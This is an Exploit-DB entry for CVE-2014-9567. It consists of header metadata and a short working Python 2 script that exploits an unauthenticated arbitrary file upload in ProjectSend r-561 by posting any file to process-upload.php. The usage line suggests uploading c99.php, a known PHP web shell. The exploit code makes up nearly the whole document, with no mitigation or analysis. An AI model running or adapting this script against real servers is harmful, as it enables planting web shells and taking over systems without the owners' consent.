ProjectSend r-561 - Arbitrary File Upload

Author: Fady Mohammed Osman
type: webapps
platform: php
date_added: 2014-12-16  
date_updated: 2014-12-16  
verified: 0  
codes: OSVDB-116469;CVE-2014-9567  
application_url: http://www.exploit-db.comProjectSend-r561.zip  

raw file: 35424.py  
#!/usr/bin/python

# Exploit Title: ProjectSend r-561 File Upload
# Date: December 01, 2014
# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
# Vendor Homepage: http://www.projectsend.org/
# Software Link: http://www.projectsend.org/download/67/
# Version: r-561
# Tested on: Kubuntu 14.10 x64


import sys
import requests
scriptName = sys.argv[0]
if (len(sys.argv) != 3):
  print "Please enter the target path and the file to upload."
  print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
  quit()
print "Exploiting ProjectSend-r561 File Upload .."
url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
print "Sending Url " + url
files = {'file': open(sys.argv[2], 'rb')}
r = requests.post(url, files=files)
print r.text